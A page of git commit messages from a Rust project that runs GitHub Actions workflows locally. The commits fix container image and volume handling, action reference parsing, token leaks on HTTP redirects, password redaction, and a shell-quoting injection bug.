bahdotsh	aa3366a797	fix: correct multiple bugs found during full codebase review It turns out that build_image_inner() in docker.rs was calling .elapsed() on a SystemTime to compute the tar mtime. That gives you "seconds since modification" — which is not what mtime means. Mtime is seconds since the Unix epoch. The fix is .duration_since(UNIX_EPOCH) like a normal person would use. While at it, the docker logs() call was passing None for options, which means it wasn't actually requesting stdout or stderr. So we were collecting logs from a stream that might not have any. Explicitly set stdout: true and stderr: true. The emulation runtime had a fun behavioral mismatch with Docker and Podman: it returned Err on non-zero exit codes, swallowing all stdout/stderr output. Docker and Podman return Ok with the exit code and let the caller decide what to do. The engine already handles non-zero exit codes in the Ok path, so the emulation was just silently eating useful output for no reason. The UI had a bounds check in next_job() that was mysteriously absent from previous_job() — the kind of inconsistency that waits patiently for someone to hit a stale workflow index and get a panic. Added the same .filter() guard. String slicing in the log processor wasn't checking char boundaries, which is fine until someone's log contains a multi-byte UTF-8 character before a bracket. Added is_char_boundary() checks. Step validation was accepting steps with only a 'name' field and no 'uses' or 'run', which is not a valid step in GitHub Actions. Fixed the validation to require at least one of the two fields that actually do something. Replaced .expect() calls on directory reads in main.rs with proper error handling. Panicking because a directory isn't readable is not great user experience.	2026-04-01 18:59:31 +05:30
bahdotsh	3296ad1f62	fix(executor): guard against empty container image and volume paths It turns out that if someone writes `container:` with an empty image string, we'd happily pass "" to Docker and let it figure out what that means. Spoiler: it doesn't. Similarly, volume specs like "/host:" or ":/container" would produce a PathBuf::from("") mount, which is the kind of thing that makes container runtimes very unhappy. Let's just skip those with a warning instead of pretending they're valid. While at it, replace the derived Serialize on ContainerCredentials with a custom impl that redacts the password field. The Debug impl was already doing this, but serde_json::to_string was still happily dumping passwords in plaintext. Please don't do that.	2026-03-31 19:13:31 +05:30
bahdotsh	2c2a633e0e	fix(executor): harden container config against credential leaks and empty volumes ContainerCredentials had a derived Debug impl that would happily dump passwords into logs, panic output, and anywhere else Debug gets called. That's exactly the kind of thing that bites you at 3am when someone adds a debug trace and suddenly credentials show up in plaintext in your log aggregator. Replace the derived Debug with a manual impl that redacts the password field. While at it, add a guard for empty volume specs that would otherwise produce undefined Docker behavior, a note about the splitn limitation with Windows paths, and fix clippy warnings on the test assertions.	2026-03-31 19:06:51 +05:30
bahdotsh	e76f723034	fix(executor): fix phantom env paths and silent volume option drop The remap_env_file closure had a fallback that would invent paths like /github/workflow/github_output when the corresponding env key didn't actually exist in job_env. Those paths point to nothing on the mounted volume, so any step that tries to write to them gets a lovely surprise. Only remap keys that actually exist in job_env now. If GITHUB_OUTPUT isn't set, we don't pretend it is. While at it, volume mount options like :ro and :rw were being silently stripped with no warning. A user specifying :ro expects a read-only mount — silently giving them read-write is not great. Emit a warning when we drop mount options, matching the existing pattern in warn_unsupported_container_fields. Add tests for both fixes plus container env precedence coverage.	2026-03-31 18:59:35 +05:30
bahdotsh	2e1452d237	fix(executor): fix volume parsing and hardcoded env path remapping The volume spec parser was using splitn(2, ':'), which means a Docker volume like "/host:/container:ro" would produce a container path of "/container:ro". That's not a path, that's a path with garbage appended. splitn(3, ':') strips the options correctly. The env path remapping was hardcoding filenames like "/github/workflow/env" instead of deriving them from the actual host paths. If environment.rs ever renames those files, the remapping silently breaks and you get to debug phantom container failures. Derive the filename from the real path instead. While at it, add unit tests for prepare_container_mounts and get_effective_runner_image — the two core functions from the container directive work that had zero test coverage. Nine tests covering Docker/Podman remapping, volume parsing (host:container, single-path, :ro/:rw options), and the image selection fallback.	2026-03-31 18:46:17 +05:30
bahdotsh	ecb9392d52	refactor(executor): deduplicate container mount logic and fix review issues The container directive support in `2eae320` had ~45 lines of identical volume-mounting and env-path-remapping code copy-pasted between the Docker-action execution branch and the run-step branch. That's not redundancy, that's a future bug waiting to happen in two places instead of one. Extract `prepare_container_mounts()` to handle the shared logic: GitHub env file remapping, container-defined volume parsing, and the runtime mode detection. Both branches now call into the same function. While at it, fix single-path volume specs (e.g. "/data" without a colon) which were being silently dropped because the code only handled the `host:container` format. Now they mount at the same path inside the container, which matches GitHub Actions behavior. Also add `warn_unsupported_container_fields()` so users actually know when their `options`, `credentials`, or `ports` fields are being ignored rather than discovering it the hard way in production. Add parser tests for `deserialize_container` covering string format, full object format, absent container, and registry image with colon in the tag.	2026-03-31 18:38:52 +05:30
bahdotsh	2eae320953	fix(executor): support job-level container directive It turns out that the Job struct in the parser had no container field at all. When a workflow specified `container: alpine:3.22.1`, serde silently dropped it, and the engine happily derived the runner image from `runs-on` instead. So `apk add` runs inside Ubuntu. Confusion ensues. Add a JobContainer type with a custom deserializer that handles both the string form (`container: alpine:3.22.1`) and the object form (`container: { image: ..., env: ..., volumes: ... }`). A new get_effective_runner_image() prefers the container image over the runs-on mapping. While at it, fix the GITHUB_ENV volume mounting for real container runtimes. The old code identity-mounted the host temp path into the container, which breaks on macOS with Podman because /var/folders doesn't exist in the VM. Now we mount the github env directory at /github/workflow/ and remap the env vars to match. Container-level env vars and volumes are also wired through with correct precedence (step > job > container). Closes #58	2026-03-31 18:05:34 +05:30
bahdotsh	c21182d389	fix(executor): handle sub-path action refs and stop mutating env in tests It turns out that action references like `github/codeql-action/init@v3` were being treated as if `github/codeql-action/init` was the repo name. The resolver would then try to fetch action.yml from `github/codeql-action/init/v3/action.yml` instead of the correct `github/codeql-action/v3/init/action.yml`. Same bug hit shallow_clone — it would try to clone a repo URL with the sub-path baked in, which obviously doesn't exist. Add a `sub_path` field to `ActionInfo` so `resolve_action` splits `owner/repo/path@ref` into its actual components. The resolver, cache key, and composite action clone all use the sub-path correctly now. While at it, stop using `std::env::set_var`/`remove_var` in the wiremock tests. Those are unsound in multi-threaded test binaries (Rust 1.83+ rightly marks them unsafe). Refactored `fetch_and_parse` to accept the token as a parameter — the tests just pass it directly, no env mutation needed.	2026-03-31 17:02:52 +05:30
bahdotsh	8661771b8a	fix(executor): fix shell injection, env var leak in tests, and missing docs Three issues from code review, all small but all real: The echo fallback in execute_step was interpolating the `uses` string directly into a single-quoted sh -c argument. A workflow with a single quote in the action ref would break out of the shell string. Escape single quotes with the standard '\'' pattern. The fetch_and_parse tests were calling env::remove_var("GITHUB_TOKEN") and env::set_var() without saving and restoring the original value. If GITHUB_TOKEN was set before the test suite ran, it would be permanently wiped for subsequent tests. All three tests now save/restore properly. While at it, document the ActionInfo::version field semantics — it's empty for docker/local refs, holds the git ref for GitHub action refs, and defaults to "main" when omitted. Future readers shouldn't have to guess.	2026-03-31 16:43:33 +05:30
bahdotsh	f53a45e25d	fix(executor): fix docker digest parsing, token leak in redirects, and missing tests It turns out that resolve_action was blindly splitting on '@' for all action references, including Docker image refs like docker://alpine@sha256:abc123. The '@' in a Docker digest is not a version separator — it's part of the image reference. Splitting it produces a nonsensical repository and a fake "version" that happens to be a SHA256 digest. Nobody noticed because the Docker path doesn't use the version field, but the parsed data was still wrong. While at it, the auth retry path in fetch_and_parse was constructing a brand new reqwest::Client on every single 404-then-retry cycle. That means a fresh TLS handshake each time, which is wasteful when we already have a perfectly good static client pattern. Promote the no-redirect client to a static Lazy, same as HTTP_CLIENT. The auth redirect flow — where we send GITHUB_TOKEN to the origin but strip it before following a redirect to a CDN — had zero test coverage. This is the kind of security invariant that really should not depend on code review alone. Add wiremock-based tests that verify the token does not leak to redirect targets, plus tests for the basic auth retry and 404 paths. Parameterize fetch_and_parse with a base_url so wiremock can intercept the requests.	2026-03-28 16:42:36 +05:30
bahdotsh	9bdf24f86b	fix(executor): fix review issues in action resolver and engine The PR review flagged three things that deserved fixing: The action resolver was silently swallowing the first error when action.yml failed and then retrying action.yaml. If action.yml existed but had a parse error, you'd never know — it just quietly tried the other filename. Now both error messages are combined so you actually get useful diagnostics. There was a stale comment in engine.rs that read "rest of the existing code for handling regular actions" — which was left over from the refactor and described absolutely nothing. Gone. The SHA detection logic in shallow_clone was inline and untested. Extract it into is_git_sha() and add proper tests covering valid SHA-1, short hashes, branch names, tags, non-hex input, and off-by-one lengths.	2026-03-28 13:20:57 +05:30
bahdotsh	ce3099d757	fix(executor): add User-Agent header and handle auth redirects properly The action resolver was making HTTP requests to raw.githubusercontent.com with no User-Agent header, which is the kind of thing that gets you silently rate-limited by GitHub's CDN. Not great when your whole resolution strategy depends on those requests actually succeeding. While at it, the no-redirect policy on the authenticated retry path was correct for preventing token leakage to non-GitHub hosts, but it also meant that legitimate CDN redirects (3xx) would fall through to the success check and produce a misleading "HTTP 301 fetching..." error. Fix this by following the redirect with HTTP_CLIENT (no auth header) when we get a 3xx, so we get the content without leaking the token. Also add a note on the SHA-1 detection in shallow_clone — it only matches 40-char hex strings, which will need updating if GitHub ever adopts SHA-256 refs.	2026-03-28 13:07:51 +05:30
bahdotsh	3ee75e6aa8	fix(executor): fix dead code, misleading comment, and token leak risk The exit_code branching in execute_step had a classic nested-condition bug: the cargo-error detail block checked `exit_code != 0` inside an `if exit_code == 0` block. That entire error path was unreachable dead code. Confusion ensues. Flatten the branching so the cargo-error path is actually reachable on failure, and the verbose-output construction doesn't gate the entire result. While at it, fix two things in action_resolver: the BoundedCache insert comment said "LRU order" when the eviction strategy is FIFO, and the authenticated retry for private repos was reusing the shared HTTP_CLIENT which follows redirects by default — meaning a hypothetical redirect away from raw.githubusercontent.com would happily forward the GITHUB_TOKEN to wherever it landed. Use a no-redirect client for the authenticated request instead.	2026-03-28 12:59:32 +05:30
bahdotsh	8dd6d1b143	fix(executor): correct misleading cache docs, token comment, and docker version semantics Three issues from code review, all minor but all worth fixing before they confuse someone later. The BoundedCache was documented as "LRU-style" when it's actually plain FIFO — get() doesn't promote keys. Nobody cares for this use case since actions resolve once per run, but calling FIFO "LRU" is the kind of lie that breeds real bugs when someone trusts the docs and adds access-pattern-dependent logic later. Fixed the comments. The 404-retry-with-GITHUB_TOKEN pattern in fetch_and_parse was correct but undocumented — it only targets raw.githubusercontent.com so there's no token-to-attacker-host risk, but that's the kind of thing you want a future reader to see immediately without having to trace the URL construction. Added a comment. resolve_action was setting version to "main" for docker:// refs and local paths (./), which is semantically wrong. Docker refs embed their tag in the repository string, and local paths have no version at all. Neither value was ever used in those code paths, but a wrong value sitting in a struct field is a bug waiting to happen. Set version to "" for both cases instead.	2026-03-28 12:45:23 +05:30
bahdotsh	de0cf0e419	fix(executor): harden action resolver: bounded cache, async clone, strict parsing The action resolver had a few problems that would bite in production. The ACTION_CACHE was an unbounded HashMap behind a Mutex — so it leaked memory indefinitely in long-running processes, and readers blocked each other for no good reason. Replace it with a bounded LRU-style cache (256 entries, oldest evicted first) behind an RwLock so concurrent reads don't serialize. shallow_clone() was using std::process::Command in async context, which blocks the tokio runtime thread. For SHA refs that's three sequential blocking operations. Convert the whole thing to tokio::process::Command. While at it, add `--` before positional args to prevent flag injection from crafted version strings, and `--single-branch` to avoid fetching unnecessary refs. The node version parser silently defaulted to 20 on malformed input ("nodefoo" -> node:20-slim). That's the kind of silent data corruption that makes debugging a nightmare. Return an error instead. HTTP timeout reduced from 15s to 5s — this is best-effort with a fallback, so waiting 30s (two filenames × 15s) on a flaky network is not helpful. GITHUB_TOKEN is now only sent on 404 retry instead of unconditionally, because leaking tokens to public repos you don't own is not great practice. Also killed a dead conditional where both branches of an if/else produced identical output.	2026-03-28 12:36:58 +05:30
bahdotsh	419ccf97d4	fix(executor): harden action resolver and kill magic string dispatch It turns out that prepare_action() was returning the string "composite" as if it were a Docker image name, and then execute_step() was checking `if image == "composite"` to decide the control flow. This is not great. Stringly-typed dispatch hiding inside what looks like an image name is the kind of thing that confuses every future contributor. Replace the String return with a proper PreparedAction enum that makes the Composite vs Image distinction explicit at the type level. While at it, fix several other bugs in the action resolver: - git clone --branch doesn't work with SHA refs, and actions pinned to full commit SHAs (a perfectly normal thing to do) would just fail with a confusing git error. Extract a shared shallow_clone() helper that detects SHA refs and uses init+fetch+checkout instead. - DockerBuild actions (ones that bundle their own Dockerfile) were silently falling through to determine_action_image(), which would cheerfully return node:20-slim. Return an explicit error instead of pretending everything is fine. - Failed action.yml fetches were permanently cached as None, so a transient network hiccup would poison the cache for the entire process lifetime. Only cache successes now. - The reusable workflow clone had the same --branch SHA bug; it now uses the shared shallow_clone() helper too.	2026-03-28 12:16:30 +05:30

1 2 3

102 Commits